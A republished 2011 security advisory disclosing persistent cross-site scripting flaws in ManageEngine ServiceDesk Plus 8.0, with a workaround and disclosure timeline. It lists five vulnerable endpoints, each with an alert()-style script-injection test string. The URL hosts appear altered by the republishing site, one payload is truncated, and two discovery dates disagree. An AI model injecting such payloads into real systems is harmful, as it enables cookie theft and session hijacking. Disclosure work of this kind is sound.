网站地图    收藏   

主页 > 后端 > 网站安全 >

ManageEngine ServiceDesk Plus 8.0 Build 8013 多重xss缺陷及

来源:自学PHP网    时间:2015-04-17 14:46 作者: 阅读:

[导读] =======================================================================Secur-I Research Group Security Advisory [ SV-2011-003]================================================================......

=======================================================================
Secur-I Research Group Security Advisory [ SV-2011-003]
=======================================================================
Title: ManageEngine ServiceDesk Plus 8.0 Build 8013 Multiple Persistence Cross Site Scripting Vulnerabilities
Product: ServiceDesk Plus
Vulnerable version: 8.0 Build 8013 (Other versions could also be affected)
Fixed version: N/A
Impact: Medium
Homepage: http://www.manageengine.com/
Vulnerability ID: SV-2011-003
Found: 2011-07-08
By: Narendra Shinde
      Secur-I Research Group
      http://securview.com/
=======================================================================
 
 
Vendor description:
-------------------
ServiceDesk Plus integrates your help desk requests and assets to help you manage your IT effectively. It helps you implement ITIL best practices and troubleshoot IT service requests faster. ServiceDesk Plus is highly customizable, easy-to-implement help desk software. More than 10,000 IT managers worldwide use ServiceDesk Plus to manage their IT help desk and assets.ServiceDesk Plus is available in 23 different languages.
 
Source: http://www.manageengine.com/products/service-desk/
 
 
Vulnerability Information:
-------------------------
Class: Improper Neutralization of Input during Web Page Generation
       ('Cross-site Scripting') [CWE-79]
Impact: Insertion and Execution of malicious scripts in user browser
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction Required : Yes
 
 
 
Vulnerability overview/description:
-----------------------------------
ServiceDesk Plus version 8.0 Build 8013 is prone to multiple persistent cross-site scripting vulnerabilities as the user-supplied input received via certain  parameters is not properly sanitized.
 
This can be exploited by submitting specially crafted input to the affected software.  Successful exploitation could allow the attacker to execute arbitrary script code within the user's browser session in the security context of the targeted site. The attacker could gain access to user's cookies (including authentication cookies), if any, associated with the targeted site, access recently submitted data by the target user via web forms, or take actions on the site masquerading as the target user.
 
 
 
Proof-of-Concept(PoC):
 
a)
URL: http://www.2cto.com /SetUpWizard.do?forwardTo=technician&fromModule=QuickAction
Action: Configuration wizard - Add New Technician
Vulnerable Parameter: Name
Test string used: '><script>alert('SecurView')</scrip
 
b)
URL: http://www.2cto.com /SiteDef.do
Action: Add a new site
Vulnerable Parameter: Site name
Test string used: '><script>alert('SecurView')</script>
 
c)
URL: http://www.2cto.com /GroupResourcesDef.do
Action: Create Group
Vulnerable Parameter: Group Name
Test string used: '><script>alert('SecurView')</script>
 
d)
URL: http://www.2cto.com /LicenseAgreement.do?operation=newagreement
Action: Add new license agreement
Vulnerable Parameter: Agreement Number
Test string used: '><script>alert('SecurView')</script>
 
e)
URL: http://www.2cto.com /ManualNodeAddition.do?isServer=true
Action: Server Configuration - Computer
Vunlerable parameter: Name
Test string used: '><script>alert('Securview')</script>
 
 
 
 
Workaround:
-----------
Proper user input filtering. For more details please refer:
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
 
Timeline:
---------
Vulnerability Found : 14/7/2011
Reported to Vendor : 14/7/2011
Confirmation from vendor : 19/7/2011
Public Disclosure : 29/7/2011
 
 
Thanks & Regards,
Narendra.
 
Confidentiality: This e-mail and any attachments may be confidential and may also be privileged. If you are not an intended named recipient, please notify the sender immediately and do not disclose the contents to another person use it for any purpose, or store or copy the information in any medium.

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论